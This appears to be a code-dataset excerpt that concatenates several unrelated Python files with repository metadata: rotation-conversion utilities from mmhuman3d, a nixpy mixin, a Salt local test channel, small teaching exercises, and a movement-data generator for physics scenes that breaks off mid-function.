|
2021-08-31T05:20:01.000Z
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""
"""
__version__ = "$Id$"
#end_pymotw_header
import textwrap
from textwrap_example import sample_text
dedented_text = textwrap.dedent(sample_text)
print 'Dedented:'
print dedented_text
| 16.166667
| 55
| 0.756014
|
92c104d45a7b0db492e61c7cf4bf10a2f5c21f2f
| 309
|
py
|
Python
|
Chapter 08/2/8.py
|
icaksh/Python-Projects-Protek
|
dfd56ea5afc637a8850911a9296131652de383c5
|
[
"MIT"
] | null | null | null |
Chapter 08/2/8.py
|
icaksh/Python-Projects-Protek
|
dfd56ea5afc637a8850911a9296131652de383c5
|
[
"MIT"
] | null | null | null |
Chapter 08/2/8.py
|
icaksh/Python-Projects-Protek
|
dfd56ea5afc637a8850911a9296131652de383c5
|
[
"MIT"
] | null | null | null |
def averageHarga(x):
listHarga = list(x.values())
jumlahan = 0
pembagi = 0
for i in listHarga:
jumlahan = jumlahan + i
pembagi += 1
average = jumlahan/pembagi
return average
buah ={'apel' : 5000, 'jeruk' : 8500, 'mangga' : 7800, 'duku' :6500}
print(averageHarga(buah))
| 25.75
| 68
| 0.608414
|
5a89bf13cc351a70fd38fca01ab09e23be272127
| 20,638
|
py
|
Python
|
mmhuman3d/utils/transforms.py
|
ykk648/mmhuman3d
|
26af92bcf6abbe1855e1a8a48308621410f9c047
|
[
"Apache-2.0"
] | 472
|
2021-12-03T03:12:55.000Z
|
2022-03-31T01:33:13.000Z
|
mmhuman3d/utils/transforms.py
|
ykk648/mmhuman3d
|
26af92bcf6abbe1855e1a8a48308621410f9c047
|
[
"Apache-2.0"
] | 127
|
2021-12-03T05:00:14.000Z
|
2022-03-31T13:47:33.000Z
|
mmhuman3d/utils/transforms.py
|
ykk648/mmhuman3d
|
26af92bcf6abbe1855e1a8a48308621410f9c047
|
[
"Apache-2.0"
] | 37
|
2021-12-03T03:23:22.000Z
|
2022-03-31T08:41:58.000Z
|
from typing import Union
import numpy
import torch
from pytorch3d.transforms import (
axis_angle_to_matrix,
axis_angle_to_quaternion,
euler_angles_to_matrix,
matrix_to_euler_angles,
matrix_to_quaternion,
matrix_to_rotation_6d,
quaternion_to_axis_angle,
quaternion_to_matrix,
rotation_6d_to_matrix,
)
from mmhuman3d.core.conventions.joints_mapping.standard_joint_angles import (
TRANSFORMATION_AA_TO_SJA,
TRANSFORMATION_SJA_TO_AA,
)
class Compose:
def __init__(self, transforms: list):
"""Composes several transforms together. This transform does not
support torchscript.
Args:
transforms (list): (list of transform functions)
"""
self.transforms = transforms
def __call__(self,
rotation: Union[torch.Tensor, numpy.ndarray],
convention: str = 'xyz',
**kwargs):
convention = convention.lower()
if not (set(convention) == set('xyz') and len(convention) == 3):
raise ValueError(f'Invalid convention {convention}.')
if isinstance(rotation, numpy.ndarray):
data_type = 'numpy'
rotation = torch.FloatTensor(rotation)
elif isinstance(rotation, torch.Tensor):
data_type = 'tensor'
else:
raise TypeError(
'Type of rotation should be torch.Tensor or numpy.ndarray')
for t in self.transforms:
if 'convention' in t.__code__.co_varnames:
rotation = t(rotation, convention.upper(), **kwargs)
else:
rotation = t(rotation, **kwargs)
if data_type == 'numpy':
rotation = rotation.detach().cpu().numpy()
return rotation
def aa_to_rotmat(
axis_angle: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""
Convert axis_angle to rotation matrixs.
Args:
axis_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3, 3).
"""
if axis_angle.shape[-1] != 3:
raise ValueError(
f'Invalid input axis angles shape f{axis_angle.shape}.')
t = Compose([axis_angle_to_matrix])
return t(axis_angle)
def aa_to_quat(
axis_angle: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""
Convert axis_angle to quaternions.
Args:
axis_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 4).
"""
if axis_angle.shape[-1] != 3:
raise ValueError(f'Invalid input axis angles f{axis_angle.shape}.')
t = Compose([axis_angle_to_quaternion])
return t(axis_angle)
def ee_to_rotmat(euler_angle: Union[torch.Tensor, numpy.ndarray],
convention='xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert euler angle to rotation matrixs.
Args:
euler_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3, 3).
"""
if euler_angle.shape[-1] != 3:
raise ValueError(
f'Invalid input euler angles shape f{euler_angle.shape}.')
t = Compose([euler_angles_to_matrix])
return t(euler_angle, convention.upper())
def rotmat_to_ee(
matrix: Union[torch.Tensor, numpy.ndarray],
convention: str = 'xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation matrixs to euler angle.
Args:
matrix (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3, 3). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
if matrix.shape[-1] != 3 or matrix.shape[-2] != 3:
raise ValueError(f'Invalid rotation matrix shape f{matrix.shape}.')
t = Compose([matrix_to_euler_angles])
return t(matrix, convention.upper())
def rotmat_to_quat(
matrix: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation matrixs to quaternions.
Args:
matrix (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3, 3). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 4).
"""
if matrix.shape[-1] != 3 or matrix.shape[-2] != 3:
raise ValueError(f'Invalid rotation matrix shape f{matrix.shape}.')
t = Compose([matrix_to_quaternion])
return t(matrix)
def rotmat_to_rot6d(
matrix: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation matrixs to rotation 6d representations.
Args:
matrix (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3, 3). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 6).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if matrix.shape[-1] != 3 or matrix.shape[-2] != 3:
raise ValueError(f'Invalid rotation matrix shape f{matrix.shape}.')
t = Compose([matrix_to_rotation_6d])
return t(matrix)
def quat_to_aa(
quaternions: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert quaternions to axis angles.
Args:
quaternions (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
if quaternions.shape[-1] != 4:
raise ValueError(f'Invalid input quaternions f{quaternions.shape}.')
t = Compose([quaternion_to_axis_angle])
return t(quaternions)
def quat_to_rotmat(
quaternions: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert quaternions to rotation matrixs.
Args:
quaternions (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3, 3).
"""
if quaternions.shape[-1] != 4:
raise ValueError(
f'Invalid input quaternions shape f{quaternions.shape}.')
t = Compose([quaternion_to_matrix])
return t(quaternions)
def rot6d_to_rotmat(
rotation_6d: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation 6d representations to rotation matrixs.
Args:
rotation_6d (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 6). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3, 3).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if rotation_6d.shape[-1] != 6:
raise ValueError(f'Invalid input rotation_6d f{rotation_6d.shape}.')
t = Compose([rotation_6d_to_matrix])
return t(rotation_6d)
def aa_to_ee(axis_angle: Union[torch.Tensor, numpy.ndarray],
convention: str = 'xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert axis angles to euler angle.
Args:
axis_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
if axis_angle.shape[-1] != 3:
raise ValueError(
f'Invalid input axis_angle shape f{axis_angle.shape}.')
t = Compose([axis_angle_to_matrix, matrix_to_euler_angles])
return t(axis_angle, convention)
def aa_to_rot6d(
axis_angle: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert axis angles to rotation 6d representations.
Args:
axis_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 6).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if axis_angle.shape[-1] != 3:
raise ValueError(f'Invalid input axis_angle f{axis_angle.shape}.')
t = Compose([axis_angle_to_matrix, matrix_to_rotation_6d])
return t(axis_angle)
def ee_to_aa(euler_angle: Union[torch.Tensor, numpy.ndarray],
convention: str = 'xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert euler angles to axis angles.
Args:
euler_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
if euler_angle.shape[-1] != 3:
raise ValueError(f'Invalid input euler_angle f{euler_angle.shape}.')
t = Compose([
euler_angles_to_matrix, matrix_to_quaternion, quaternion_to_axis_angle
])
return t(euler_angle, convention)
def ee_to_quat(euler_angle: Union[torch.Tensor, numpy.ndarray],
convention='xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert euler angles to quaternions.
Args:
euler_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 4).
"""
if euler_angle.shape[-1] != 3:
raise ValueError(f'Invalid input euler_angle f{euler_angle.shape}.')
t = Compose([euler_angles_to_matrix, matrix_to_quaternion])
return t(euler_angle, convention)
def ee_to_rot6d(euler_angle: Union[torch.Tensor, numpy.ndarray],
convention='xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert euler angles to rotation 6d representation.
Args:
euler_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 6).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if euler_angle.shape[-1] != 3:
raise ValueError(f'Invalid input euler_angle f{euler_angle.shape}.')
t = Compose([euler_angles_to_matrix, matrix_to_rotation_6d])
return t(euler_angle, convention)
def rotmat_to_aa(
matrix: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation matrixs to axis angles.
Args:
matrix (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3, 3). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
if matrix.shape[-1] != 3 or matrix.shape[-2] != 3:
raise ValueError(f'Invalid rotation matrix shape f{matrix.shape}.')
t = Compose([matrix_to_quaternion, quaternion_to_axis_angle])
return t(matrix)
def quat_to_ee(quaternions: Union[torch.Tensor, numpy.ndarray],
convention: str = 'xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert quaternions to euler angles.
Args:
quaternions (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 4). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
if quaternions.shape[-1] != 4:
raise ValueError(f'Invalid input quaternions f{quaternions.shape}.')
t = Compose([quaternion_to_matrix, matrix_to_euler_angles])
return t(quaternions, convention)
def quat_to_rot6d(
quaternions: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert quaternions to rotation 6d representations.
Args:
quaternions (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 4). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 6).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if quaternions.shape[-1] != 4:
raise ValueError(f'Invalid input quaternions f{quaternions.shape}.')
t = Compose([quaternion_to_matrix, matrix_to_rotation_6d])
return t(quaternions)
def rot6d_to_aa(
rotation_6d: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation 6d representations to axis angles.
Args:
rotation_6d (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 6). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if rotation_6d.shape[-1] != 6:
raise ValueError(f'Invalid input rotation_6d f{rotation_6d.shape}.')
t = Compose([
rotation_6d_to_matrix, matrix_to_quaternion, quaternion_to_axis_angle
])
return t(rotation_6d)
def rot6d_to_ee(rotation_6d: Union[torch.Tensor, numpy.ndarray],
convention: str = 'xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation 6d representations to euler angles.
Args:
rotation_6d (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 6). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if rotation_6d.shape[-1] != 6:
raise ValueError(f'Invalid input rotation_6d f{rotation_6d.shape}.')
t = Compose([rotation_6d_to_matrix, matrix_to_euler_angles])
return t(rotation_6d, convention)
def rot6d_to_quat(
rotation_6d: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation 6d representations to quaternions.
Args:
rotation (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 6). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 4).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if rotation_6d.shape[-1] != 6:
raise ValueError(
f'Invalid input rotation_6d shape f{rotation_6d.shape}.')
t = Compose([rotation_6d_to_matrix, matrix_to_quaternion])
return t(rotation_6d)
def aa_to_sja(
axis_angle: Union[torch.Tensor, numpy.ndarray],
R_t: Union[torch.Tensor, numpy.ndarray] = TRANSFORMATION_AA_TO_SJA,
R_t_inv: Union[torch.Tensor, numpy.ndarray] = TRANSFORMATION_SJA_TO_AA
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert axis-angles to standard joint angles.
Args:
axis_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 21, 3), ndim of input is unlimited.
R_t (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 21, 3, 3). Transformation matrices from
original axis-angle coordinate system to
standard joint angle coordinate system,
ndim of input is unlimited.
R_t_inv (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 21, 3, 3). Transformation matrices from
standard joint angle coordinate system to
original axis-angle coordinate system,
ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
def _aa_to_sja(aa, R_t, R_t_inv):
R_aa = axis_angle_to_matrix(aa)
R_sja = R_t @ R_aa @ R_t_inv
sja = matrix_to_euler_angles(R_sja, convention='XYZ')
return sja
if axis_angle.shape[-2:] != (21, 3):
raise ValueError(
f'Invalid input axis angles shape f{axis_angle.shape}.')
if R_t.shape[-3:] != (21, 3, 3):
raise ValueError(f'Invalid input R_t shape f{R_t.shape}.')
if R_t_inv.shape[-3:] != (21, 3, 3):
raise ValueError(f'Invalid input R_t_inv shape f{R_t.shape}.')
t = Compose([_aa_to_sja])
return t(axis_angle, R_t=R_t, R_t_inv=R_t_inv)
def sja_to_aa(
sja: Union[torch.Tensor, numpy.ndarray],
R_t: Union[torch.Tensor, numpy.ndarray] = TRANSFORMATION_AA_TO_SJA,
R_t_inv: Union[torch.Tensor, numpy.ndarray] = TRANSFORMATION_SJA_TO_AA
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert standard joint angles to axis angles.
Args:
sja (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 21, 3). ndim of input is unlimited.
R_t (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 21, 3, 3). Transformation matrices from
original axis-angle coordinate system to
standard joint angle coordinate system
R_t_inv (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 21, 3, 3). Transformation matrices from
standard joint angle coordinate system to
original axis-angle coordinate system
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
def _sja_to_aa(sja, R_t, R_t_inv):
R_sja = euler_angles_to_matrix(sja, convention='XYZ')
R_aa = R_t_inv @ R_sja @ R_t
aa = quaternion_to_axis_angle(matrix_to_quaternion(R_aa))
return aa
if sja.shape[-2:] != (21, 3):
raise ValueError(f'Invalid input axis angles shape f{sja.shape}.')
if R_t.shape[-3:] != (21, 3, 3):
raise ValueError(f'Invalid input R_t shape f{R_t.shape}.')
if R_t_inv.shape[-3:] != (21, 3, 3):
raise ValueError(f'Invalid input R_t_inv shape f{R_t.shape}.')
t = Compose([_sja_to_aa])
return t(sja, R_t=R_t, R_t_inv=R_t_inv)
| 37.591985
| 79
| 0.637901
|
183738330f17bd6c8c8139a885b108b77ccd94c8
| 1,394
|
py
|
Python
|
nix/entity_with_sources.py
|
gicmo/nixpy
|
015bef00af764f3f773fb0e8fe5afa660669adf8
|
[
"BSD-3-Clause"
] | null | null | null |
nix/entity_with_sources.py
|
gicmo/nixpy
|
015bef00af764f3f773fb0e8fe5afa660669adf8
|
[
"BSD-3-Clause"
] | null | null | null |
nix/entity_with_sources.py
|
gicmo/nixpy
|
015bef00af764f3f773fb0e8fe5afa660669adf8
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2014, German Neuroinformatics Node (G-Node)
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted under the terms of the BSD License. See
# LICENSE file in the root of the Project.
from __future__ import (absolute_import, division, print_function, unicode_literals)
from nix.core import DataArray, MultiTag, Tag
from nix.util.inject import inject
from nix.util.proxy_list import RefProxyList
class RefSourceProxyList(RefProxyList):
def __init__(self, obj):
super(RefSourceProxyList, self).__init__(obj, "_source_count", "_get_source_by_id",
"_get_source_by_pos", "_remove_source_by_id", "_add_source_by_id")
_sources_doc = """
Getter for sources.
"""
def _get_sources(self):
if not hasattr(self, "_sources"):
setattr(self, "_sources", RefSourceProxyList(self))
return self._sources
class DataArraySourcesMixin(DataArray):
sources = property(_get_sources, None, None, _sources_doc)
class MultiTagSourcesMixin(MultiTag):
sources = property(_get_sources, None, None, _sources_doc)
class TagSourcesMixin(Tag):
sources = property(_get_sources, None, None, _sources_doc)
inject((DataArray,), dict(DataArraySourcesMixin.__dict__))
inject((MultiTag,), dict(MultiTagSourcesMixin.__dict__))
inject((Tag,), dict(TagSourcesMixin.__dict__))
| 27.88
| 91
| 0.753228
|
25e521cde364d7969a1029d5f4d17960bfcaa467
| 1,726
|
py
|
Python
|
salt/transport/local.py
|
yuriks/salt
|
d2a5bd8adddb98ec1718d79384aa13b4f37e8028
|
[
"Apache-2.0",
"MIT"
] | 1
|
2020-03-31T22:51:16.000Z
|
2020-03-31T22:51:16.000Z
|
salt/transport/local.py
|
yuriks/salt
|
d2a5bd8adddb98ec1718d79384aa13b4f37e8028
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
salt/transport/local.py
|
yuriks/salt
|
d2a5bd8adddb98ec1718d79384aa13b4f37e8028
|
[
"Apache-2.0",
"MIT"
] | 1
|
2021-09-30T07:00:01.000Z
|
2021-09-30T07:00:01.000Z
|
# -*- coding: utf-8 -*-
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
# Import Salt Libs
import salt.utils.files
from salt.transport.client import ReqChannel
log = logging.getLogger(__name__)
class LocalChannel(ReqChannel):
'''
Local channel for testing purposes
'''
def __init__(self, opts, **kwargs):
self.opts = opts
self.kwargs = kwargs
self.tries = 0
def close(self):
'''
Close the local channel.
Currently a NOOP
'''
def send(self, load, tries=3, timeout=60, raw=False):
if self.tries == 0:
log.debug('LocalChannel load: %s', load)
#data = json.loads(load)
#{'path': 'apt-cacher-ng/map.jinja', 'saltenv': 'base', 'cmd': '_serve_file', 'loc': 0}
#f = open(data['path'])
with salt.utils.files.fopen(load['path']) as f:
ret = {
'data': ''.join(f.readlines()),
'dest': load['path'],
}
print('returning', ret)
else:
# end of buffer
ret = {
'data': None,
'dest': None,
}
self.tries = self.tries + 1
return ret
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
super(LocalChannel, self).crypted_transfer_decode_dictentry(load,
dictkey=dictkey,
tries=tries,
timeout=timeout)
| 30.280702
| 99
| 0.488413
|
9056bf20ad5e88455a4a8cac66a57a3aaad8dc3a
| 10,107
|
py
|
Python
|
hypercube/generate_movement.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 4
|
2021-02-04T03:57:52.000Z
|
2022-02-08T18:19:58.000Z
|
hypercube/generate_movement.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 68
|
2021-05-06T08:52:46.000Z
|
2022-03-23T16:46:03.000Z
|
hypercube/generate_movement.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 1
|
2021-02-04T03:21:57.000Z
|
2021-02-04T03:21:57.000Z
|
import json
from generator.occluders import OCCLUDER_BUFFER
from .intuitive_physics_hypercubes import (
MAX_TARGET_Z,
MIN_TARGET_Z,
MOVEMENT_JSON_FILENAME,
STEP_Z,
object_x_to_occluder_x,
retrieve_off_screen_position_x,
validate_in_view,
)
from .movements import (
DEEP_EXIT_LIST,
DEEP_STOP_LIST,
MOVE_EXIT_LIST,
MOVE_STOP_LIST,
TOSS_EXIT_LIST,
TOSS_STOP_LIST,
)
"""
This script creates the movements.json data file with all the movements used
by the passive intuitive physics scenes. Rerun this script whenever you update
movements.py and commit movements.json to the git repository.
"""
# Somewhat arbitrary
SLOWDOWN = 0.02
EXIT_LIST = [
('deepExit', DEEP_EXIT_LIST, False, False),
('tossExit', TOSS_EXIT_LIST, False, False)
]
STOP_LIST = [
('moveStop', MOVE_STOP_LIST, True, False),
('deepStop', DEEP_STOP_LIST, True, False),
('tossStop', TOSS_STOP_LIST, True, True)
]
EXIT_STOP_LIST = EXIT_LIST + STOP_LIST
def mark_stop_step():
"""Mark the step on which the object will (almost completely) stop moving
in each stop-on-screen movement."""
for movement_list in [MOVE_STOP_LIST, DEEP_STOP_LIST, TOSS_STOP_LIST]:
for movement in movement_list:
for index, value in enumerate(movement['xDistanceByStep']):
if index > 0:
prior = movement['xDistanceByStep'][index - 1]
if value < (prior + SLOWDOWN):
movement['stopStep'] = index
break
if 'stopStep' not in movement:
movement['stopStep'] = len(movement['xDistanceByStep']) - 1
def mark_land_step():
"""Mark the step on which the object will land on the ground in each
toss-and-stop-on-screen movement."""
for movement_list in [TOSS_STOP_LIST]:
for movement in movement_list:
y_list = [y for y in movement['yDistanceByStep'] if y >= SLOWDOWN]
movement['landStep'] = len(y_list) - 1
def identify_matching_movement(starting_data_list, movement_data_list):
"""Return the full list of matching X/Z positions, steps, and movements."""
if len(movement_data_list) == 0:
return starting_data_list
name, other_move_list, does_stop, does_land = movement_data_list[0]
matching_data_list = []
# Iterate over each item in the data list...
for position_z, step, position_x, move_index_list in starting_data_list:
# Iterate over each move in the move list...
for index, other_move in enumerate(other_move_list):
# Find each comparison step in the other move.
other_step_list = (
([(step, (not does_stop))]) +
([(other_move['stopStep'], True)] if does_stop else []) +
([(other_move['landStep'], False)] if does_land else [])
)
successful = True
for other_step, validate_position in other_step_list:
if len(other_move['xDistanceByStep']) <= other_step:
successful = False
break
# Identify the starting position.
other_z = other_move.get('startZ', position_z)
other_x = other_move.get('startX', (
-1 * retrieve_off_screen_position_x(other_z)
))
# Find the step's comparison X position in the other move.
other_position_x = object_x_to_occluder_x(
(other_x + other_move['xDistanceByStep'][other_step]),
(other_z + other_move['zDistanceByStep'][other_step])
if 'zDistanceByStep' in other_move else other_z
)
if (
other_position_x is None or
not validate_in_view(other_position_x)
):
successful = False
break
# Verify that each X is almost the same, if needed.
if validate_position and (
other_position_x >= (position_x + OCCLUDER_BUFFER) or
other_position_x <= (position_x - OCCLUDER_BUFFER)
):
successful = False
break
# If all the X positions are approximately the same, then it's a
# match! Add the data with this move's index to the output.
if successful:
matching_data_list.append((
position_z, step, position_x, move_index_list + [index]
))
print(f'DONE {name} WITH {len(matching_data_list)}')
# Call recursively on the next move.
return identify_matching_movement(
matching_data_list,
movement_data_list[1:]
)
def save_matching_movement(
movement,
matching_data_list,
option_list_property,
movement_data_list
):
"""Add each data item in the given list to the option list with the given
property."""
for matching_data in matching_data_list:
position_z, step, _, move_index_list = matching_data
if step not in movement[option_list_property][position_z]:
movement[option_list_property][position_z][step] = []
# Save each movement's name with its matching index.
option = {}
for index, movement_index in enumerate(move_index_list):
option[movement_data_list[index][0]] = movement_index
# If this option will have both deep movements, ensure that they will
# both use the same X/Z starting position (if not, skip it!).
if 'deepExit' in option and 'deepStop' in option:
deep_exit = DEEP_EXIT_LIST[option['deepExit']]
deep_stop = DEEP_STOP_LIST[option['deepStop']]
if (
deep_exit['startX'] != deep_stop['startX'] or
deep_exit['startZ'] != deep_stop['startZ']
):
# Delete the empty array first to avoid an issue later.
if len(movement[option_list_property][position_z][step]) == 0:
del movement[option_list_property][position_z][step]
continue
# Add it as an option in this list.
movement[option_list_property][position_z][step].append(option)
def make_each_full_option_list():
"""Make each option list in each move-and-exit-the-screen movement."""
iterator_z_max = (MAX_TARGET_Z - MIN_TARGET_Z) / STEP_Z
for movement in MOVE_EXIT_LIST:
movement['exitOnlyOptionList'] = {}
movement['exitStopOptionList'] = {}
exit_only_starting_data_list = []
exit_stop_starting_data_list = []
# Iterate over each possible Z position...
for iterator_z in range(int(iterator_z_max) + 1):
position_z = round(MIN_TARGET_Z + (STEP_Z * iterator_z), 2)
starting_x = -1 * retrieve_off_screen_position_x(position_z)
# Add each possible Z position as a key in each option list.
movement['exitOnlyOptionList'][position_z] = {}
movement['exitStopOptionList'][position_z] = {}
# Iterate over each step in the current movement...
for step in range(len(movement['xDistanceByStep'])):
position_x = object_x_to_occluder_x(
(starting_x + movement['xDistanceByStep'][step]),
(position_z + movement['zDistanceByStep'][step])
if 'zDistanceByStep' in movement else position_z
)
if (
# Skip step 0 because it will never be within view.
position_x is None or step == 0 or
# Ensure an occluder at this X position is within view.
not validate_in_view(position_x)
):
continue
# Add the X/Z position with its step to each data list.
exit_only_starting_data_list.append(
(position_z, step, position_x, [])
)
exit_stop_starting_data_list.append(
(position_z, step, position_x, [])
)
print(f'MAKING exitOnlyOptionList ON moveExit {movement["forceX"]}')
exit_only_matching_data_list = identify_matching_movement(
exit_only_starting_data_list,
EXIT_LIST
)
print(f'SAVING exitOnlyOptionList ON moveExit {movement["forceX"]}')
save_matching_movement(
movement,
exit_only_matching_data_list,
'exitOnlyOptionList',
EXIT_LIST
